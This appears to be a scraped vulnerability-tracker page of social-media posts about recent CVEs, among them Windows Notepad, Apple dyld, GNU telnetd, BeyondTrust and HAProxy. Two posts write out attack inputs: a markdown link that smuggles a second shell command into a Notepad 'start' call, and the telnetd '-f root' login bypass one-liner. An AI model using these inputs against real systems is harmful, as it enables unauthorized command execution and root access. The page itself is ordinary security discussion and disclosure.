Overview
- Microsoft
- Windows Notepad
Description
Statistics
- 8 Posts
- 7 Interactions
Fediverse
clown world
https://www.cve.org/CVERecord?id=CVE-2026-20841
@odo
From https://www.cve.org/CVERecord?id=CVE-2026-20841
> Improper neutralization of special elements used in a command ('command injection') […]
So maybe notepad just runs something like
```cmd
start "" $link_src
```
And when you write something like
```md
[trust me bro](mailto:foo@bar.baz & echo u pwnd)
```
in your md ...
It maybe translates to something like
```cmd
start "" mailto:foo@bar.baz & echo u pwnd
```
I don't know what the actual vuln is. But sounds like something like the above. Hopefully not that simple. 🤞
Bluesky
Description
Statistics
- 10 Posts
- 5 Interactions
Fediverse
🚨 CRITICAL: CVE-2026-20700 impacts Apple macOS, iOS, iPadOS & more before v26.3. Memory corruption enables arbitrary code execution — exploited in sophisticated, targeted attacks. Urgently update all devices! https://radar.offseq.com/threat/cve-2026-20700-an-attacker-with-memory-write-capab-30065920 #OffSeq #AppleSecurity #CVE202620700 #ThreatIntel
Apple aktualisiert alles 2026-02
Apples reguläre Updates im Februar flicken 71 Sicherheitslücken. Einige von denen stecken in mehreren von Apple Produkten. Bemerkenswert ist CVE-2026-20700, die bereits für Angriffe ausgenutzt wird (Zero-Day). Weitere drei neue Sicherheitslücken betreffen die Spracherkennung (Siri), ermöglichen sie doch, auch einem gesperrten iPhone persönliche Daten zu entloc
https://www.pc-fluesterer.info/wordpress/taxopress_logs/apple-aktualisiert-alles-2026-02/
The vulnerability, tracked as CVE-2026-20700 (CVSS score: N/A), has been described as a memory corruption issue in dyld, Apple's Dynamic Link Editor. https://thehackernews.com/2026/02/apple-fixes-exploited-zero-day.html
Update your iPhones to iOS 26.3, CVE-2026-20700 is pretty bad!
https://go.theregister.com/feed/www.theregister.com/2026/02/12/apple_ios_263/
‼️ CISA has added 3 vulnerabilities to the KEV Catalog
CVE-2025-15556: Notepad++ Download of Code Without Integrity Check Vulnerability: Notepad++ when using the WinGUp updater, contains a download of code without integrity check vulnerability that could allow an attacker to intercept or redirect update traffic to download and execute an attacker-controlled installer. This could lead to arbitrary code execution with the privileges of the user.
CVE-2026-20700: Apple Multiple Buffer Overflow Vulnerability: Apple iOS, macOS, tvOS, watchOS, and visionOS contain an improper restriction of operations within the bounds of a memory buffer vulnerability that could allow an attacker with memory write the capability to execute arbitrary code.
CVE-2024-43468: Microsoft Configuration Manager SQL Injection Vulnerability: Microsoft Configuration Manager contains an SQL injection vulnerability. An unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the target environment which are processed in an unsafe manner enabling the attacker to execute commands on the server and/or underlying database.
Bluesky
Overview
Description
Statistics
- 3 Posts
- 105 Interactions
Fediverse
I'm just reading this GNU telnetd CVE from last month. I did not realize that telnet was still a thing, but it turns out anybody could provide a username of "-f root" and, boom, they had root. The vulnerability existed for 11 years. *Wow*. https://www.cve.org/CVERecord?id=CVE-2026-24061
USER='-f root' telnet -a ur.momma
root@ur.momma:~# got em!
https://www.cve.org/CVERecord?id=CVE-2026-24061
https://lists.gnu.org/archive/html/bug-inetutils/2026-01/msg00004.html
Overview
Description
Statistics
- 2 Posts
- 4 Interactions
Fediverse
https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Overview
- checkpoint
- Hramony SASE
Description
Statistics
- 2 Posts
Fediverse
https://blog.amberwolf.com/blog/2026/january/advisory---check-point-harmony-local-privilege-escalation-cve-2025-9142/
/via @badsectorlabs
Overview
- nyariv
- SandboxJS
Description
Statistics
- 2 Posts
Overview
Description
Statistics
- 2 Posts
- 14 Interactions
Overview
- BeyondTrust
- Remote Support(RS) & Privileged Remote Access(PRA)
Description
Statistics
- 2 Posts
- 14 Interactions
Fediverse
It took less than a day. A PoC for BeyondTrust CVE-2026-1731 hit GitHub, and GreyNoise immediately started seeing reconnaissance from multi-exploit actors hiding behind VPNs + custom tooling. See what our data reveals about who’s mapping targets + how.
🔗 https://www.greynoise.io/blog/reconnaissance-beyondtrust-rce-cve-2026-1731
Overview
Description
Statistics
- 2 Posts
- 3 Interactions
Fediverse
2 vulnerabilities in HAProxy have been fixed:
CVE-2026-26080 and CVE-2026-26081. DoS affecting QUIC
https://www.haproxy.com/blog/cves-2026-quic-denial-of-service
Overview
Description
Statistics
- 3 Posts